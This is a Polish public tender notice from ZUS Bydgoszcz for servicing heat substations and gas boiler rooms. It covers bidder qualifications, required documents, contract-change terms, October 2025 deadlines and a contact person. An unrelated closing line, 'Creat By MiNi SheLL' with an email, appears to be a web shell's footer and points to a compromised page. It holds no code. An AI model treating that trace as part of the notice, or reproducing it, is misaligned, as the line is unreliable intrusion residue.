Wykonawca spełni warunek jeżeli wykaże, że: należycie wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną usługę serwisu węzłów cieplnych i kotłowni gazowych w budynkach użyteczności publicznej* o wartości umowy:<br/><br/> co najmniej 50.000 złotych brutto w ramach jednej umowy lub kilku umów zrealizowanej/ych w sposób nieprzerwany przez okres co najmniej 12 miesięcy kalendarzowych <br/>* Przez „budynki użyteczności publicznej&#34; należy rozumieć obiekty rozumiane zgodnie z definicją zawartą w § 3 ust. 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t.j. Dz.U. z 2022 r., poz. 1225 ze zm.) tj.: „budynki przeznaczone na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inne budynki przeznaczone do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny&#34;<br/><br/>2)	Wykonawca spełni warunek, jeżeli wykaże, iż dysponuje co najmniej 3 serwisantami posiadającymi świadectwo kwalifikacyjne E uprawniające do wykonywania pracy na stanowisku eksploatacji i dysponuje co najmniej 3 serwisantami posiadającymi świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w poniższym zakresie:<br/> A) Uprawnienia w zakresie obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym:<br/>Grupa I – Urządzenia instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną –<br/>pkt 2 – urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kW, <br/>pkt 13 - aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych w pkt.1-12<br/>zgodnie z załącznikiem nr 1 do rozporządzenia Ministra Klimatu i środowiska z dnia 1 lipca 2022 r. W sprawie szczegółowych zasad stwierdzania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń , instalacji i sieci ( Dz.U. 2022 poz. 1392)<br/>LUB<br/>pkt 2 – urządzenia, instalacje i sieci elektroenergetyczne o napięciu znamionowym nie wyższym niż 1 kV;<br/>pkt 10 - -aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych w pkt 1-9;<br/>zgodnie z załącznikiem nr 2 do rozporządzenia Ministra Klimatu i środowiska z dnia 1 lipca 2022 r. W sprawie szczegółowych zasad stwierdzania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń , instalacji i sieci ( Dz.U. 2022 poz. 1392) <br/><br/>B) Uprawnienia w zakresie obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym:<br/>Grupa II – Urządzenia wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne<br/>pkt 1 – kotły parowe oraz wodne na paliwa stałe, płynne i gazowe o mocy wyższej niż 50 kW wraz z urządzeniami pomocniczymi.<br/>pkt 4 - sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła wyższym niż 50 kW i o przesyle ciepła nie wyższym niż 500 kW;<br/>pkt 21 - aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń, instalacji i sieci wymienionych w pkt 1–20 <br/>zgodnie z załącznikiem nr 1 do rozporządzenia Ministra Klimatu i środowiska z dnia 1 lipca 2022 r. W sprawie szczegółowych zasad stwierdzania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń , instalacji i sieci ( Dz.U. 2022 poz. 1392) <br/>LUB<br/>pkt 1 - kotły parowe oraz wodne na paliwa stałe, płynne i gazowe, o mocy wyższej niż 50 kW, wraz z urządzeniami pomocniczymi;<br/>Pkt 2 - sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła wyższym niż 50 kW;<br/>Pkt 10- aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji wymienionych w pkt 1-9;<br/>zgodnie z załącznikiem nr 2 do rozporządzenia Ministra Klimatu i środowiska z dnia 1 lipca 2022 r. W sprawie szczegółowych zasad stwierdzania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń , instalacji i sieci ( Dz.U. 2022 poz. 1392) <br/><br/>C) Uprawnienia w zakresie obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym:<br/>Grupa III – Urządzenia, instalacje i sieci gazowe wytwarzające, przetwarzające, przesyłające, magazynujące i zużywające paliwa gazowe <br/>pkt 4 - sieci gazowe o ciśnieniu nie wyższym niż 0,5 MPa (gazociągi, stacje gazowe, zespoły gazowe na przyłączu, w tym punkty gazowe);<br/>pkt 6 – urządzenia i instalacje gazowe o ciśnieniu nie wyższym niż 5 kPa.<br/>Pkt 10 - aparatura kontrolno-pomiarowa, urządzenia sterowania do urządzeń, instalacji i sieci wymienionych w pkt 1–9 <br/>zgodnie z załącznikiem nr 1 do rozporządzenia Ministra Klimatu i środowiska z dnia 1 lipca 2022 r. W sprawie szczegółowych zasad stwierdzania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń , instalacji i sieci ( Dz.U. 2022 poz. 1392) <br/>LUB	<br/>pkt 4- sieci gazowe o ciśnieniu nie wyższym niż 0,5 MPa (gazociągi i punkty redukcyjne, stacje gazowe);<br/>pkt 6- urządzenia i instalacje gazowe o ciśnieniu nie wyższym niż 5 kPa;<br/>pkt 10 - aparatura kontrolno-pomiarowa, urządzenia sterowania do sieci, urządzeń i instalacji wymienionych w pkt 1-9.<br/>zgodnie z załącznikiem nr 2 do rozporządzenia Ministra Klimatu i środowiska z dnia 1 lipca 2022 r. W sprawie szczegółowych zasad stwierdzania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń , instalacji i sieci ( Dz.U. 2022 poz. 1392) <br/><br/>Uwaga : W przypadku posiadania aktualnego świadectwa kwalifikacyjnego odpowiednio E/D uprawniającego do wykonywania pracy na stanowisku odpowiednio eksploatacji/dozoru wydanego na podstawie wcześniejszych przepisów w zakresie remontów, uznaje się, że obejmują one również swoim zakresem naprawy w rozumieniu aktualnie obowiązujących przepisów.<br/><br/>Zamawiający nie dopuszcza, aby warunek w zakresie posiadania świadectwa kwalifikacji E i D w podanym zakresie spełniała ta sama osoba.<br/><br/>Uwaga:<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum lub spółka cywilna, mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi do realizacji których te zdolności są wymagane. W takim przypadku, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączą do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (zgodnie z Załącznikiem nr 8 do SWZ).<br/><br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek doświadczenia którym mowa w pkt. 4 (1) zostanie uznany za spełniony jeżeli jeden z podmiotów wspólnie ubiegających się o zamówienie wykaże spełnianie warunku. <br/>W przypadku warunku posiadania odpowiedniego potencjału osobowego o którym mowa w pkt. 4. (2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą wykazać spełnienie warunku łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed<br/>udzieleniem zamówienia, przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych potwierdzających brak podstaw wykluczenia, tj.:<br/>1.	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, sporządzonego zgodnie z Załącznikiem nr 4 do SWZ;<br/>2.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3.	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 ustawy, art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 ustawy, art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2023 r. poz. 70 ze zm.) zgodnie z Załącznikiem nr 6 do SWZ. <br/>6.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumentów dotyczących każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w celu wykazania braku istnienia wobec niego podstaw wykluczenia.<br/>7.	dokumentów dotyczących podmiotu trzeciego, na którego zdolnościach technicznych lub zawodowych polega Wykonawca, w celu wykazania braku istnienia wobec nich podstaw wykluczenia, wymienionych w pkt 2. –5. SWZ – jeżeli Wykonawca polega na zasobach podmiotu trzeciego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>potwierdzających spełnianie warunków udziału w postępowaniu, tj. :<br/>1. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane – wg wzoru stanowiącego Załącznik nr 7a do SWZ, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. Przy czym dowodami potwierdzającymi czy usługi zostały wykonane należycie są:<br/>−	referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane,<br/>−	a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy.<br/> W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>2. wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego wg wzoru stanowiącego Załącznik nr 7b do SWZ wraz z informacjami na temat uprawnień, zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składa się:<br/>1.	Formularz oferty wypełniony zgodnie z Załącznikiem nr 1 do SWZ,<br/>2.	Formularz cenowy wypełniony zgodnie z Załącznikiem nr 2 do SWZ.<br/>3. aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w Załączniku nr 5 do SWZ. Informacje zawarte w oświadczeniu będą stanowiły potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (sporządzone zgodnie z Załącznikiem nr 9 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - jeżeli Wykonawca polega na zasobach lub sytuacji podmiotu trzeciego.<br/>5.	Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie, z którego wynika, które usługi wykonają poszczególni Wykonawcy, sporządzone zgodnie ze wzorem zamieszczonym w Załączniku nr 8 do SWZ.<br/>6.	Oświadczenie o zastrzeżeniu informacji – jeżeli dotyczy -załącznik nr 3 do SWZ.<br/>7.	Oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (zgodnie z Załącznikiem nr 10 do SWZ) - składa Wykonawca, a w przypadku wspólnego ubiegania się o zamówienie każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>8.	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik – pełnomocnictwo określające jego zakres, podpisane przez osobę/y upoważnione do reprezentacji wskazane we właściwym rejestrze, z którego wynika prawo do podpisania oferty oraz do podpisania innych dokumentów składanych wraz z ofertą.<br/>9.	W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie <br/>o udzielenie zamówienia - pełnomocnictwo określające zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie wstępne składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia. Zasady dotyczące składania oraz formy oświadczenia wstępnego<br/>określone w SWZ stosuje się <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień umowy następuje w formie pisemnego aneksu pod rygorem nieważności z wyłączeniem przypadków<br/>wskazanych w umowie.<br/>Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca, jak i Zamawiający.<br/>Zmiana postanowień niniejszej Umowy w stosunku do treści Oferty Wykonawcy, na podstawie której dokonano wyboru Wykonawcy jest możliwa w przypadkach opisanych poniżej, z zastrzeżeniem, iż zmiany te nie wykraczają poza określenie przedmiotu zamówienia oraz Strony Umowy wyraziły zgodę na wprowadzenie zmian. Wystąpienie którejkolwiek z okoliczności wskazanych poniżej nie stanowi zobowiązania Stron do wprowadzenia zmiany.<br/>Niezależnie od treści innych zapisów Umowy, zmiana postanowień Umowy w stosunku do treści Oferty Wykonawcy jest możliwa w przypadku wystąpienia któregokolwiek z następujących przypadków: <br/>1)	wystąpienia okoliczności niezależnych od woli stron, których nie można było przewidzieć, a w wyniku których spełnienie świadczenia w terminach określonym w umowie okazało się niemożliwe lub znacznie utrudnione;<br/>2)	zmiany sposobu wykonywania umowy, której nie można było przewidzieć w chwili zawarcia Umowy;<br/>3)	rezygnacji z Podwykonawcy/zmiany Podwykonawcy/powierzenia realizacji część przedmiotu zamówienia Podwykonawcy;<br/>4)	zmiany wynagrodzenia Wykonawcy w przypadkach określonych w umowie;<br/>5)	zmiany terminu realizacji czynności określonych w Opisie przedmiotu zamówienia, stanowiącym załącznik nr 1 do umowy;<br/>6)	zmiany terminu realizacji przeglądu z konserwacją, terminu naprawy, wykonania instrukcji z przyczyn niezależnych od Wykonawcy;<br/>7)	zmniejszenie zakresu przedmiotu zamówienia (maksymalnie o 20%) w przypadku zmian po stronie Oddziału ZUS w Bydgoszczy, w przypadku zmian organizacyjnych lub funkcjonalnych po stronie Zamawiającego, wyłączenia budynków/części budynków z użytkowania;<br/>8)	zmiany nieistotne;<br/>9)	zmiany postanowień dotyczących zasad wprowadzania zmian wysokości wynagrodzenia Wykonawcy (waloryzacja wynagrodzenia), w szczególności w zakresie maksymalnej wartości zmiany tego wynagrodzenia;<br/>10)	zmiany serwisantów,<br/>11)	zmiana czasu reakcji/czasu realizacji naprawy, z zastrzeżeniem czasu reakcji na zgłoszoną awarię kotła grzewczego/kotłowni zaoferowanego w formularzu ofertowym Wykonawcy stanowiącym załącznik nr 7 do umowy, który nie podlega zmianie.<br/>Wynagrodzenie Wykonawcy może ulec zmianie w przypadku zmiany;<br/>1)	stawki podatku od towarów i usług oraz podatku akcyzowego;<br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018r. o pracowniczych planach kapitałowych<br/> – jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>Zmiana serwisantów jest możliwa pod warunkiem:<br/>1)	wykazania wymaganych uprawnień określonych w warunkach udziału <br/>w postępowaniu w SWZ, <br/>oraz <br/>2)	wykazania doświadczenia serwisanta równego co najmniej podanemu w ofercie Wykonawcy przyjętemu do kryterium oceny ofert <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy zakupowej pod adresem https://zus.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Osobą uprawnioną do kontaktu z Wykonawcami jest:<br/>imię i nazwisko: Jowita Ośmiałowska<br/>e-mail: zampubl_bydgoszcz@zus.pl<br/>godziny pracy: 7:00 – 14:00<br/>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy<br/>z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego

Creat By MiNi SheLL
Email: jattceo@gmail.com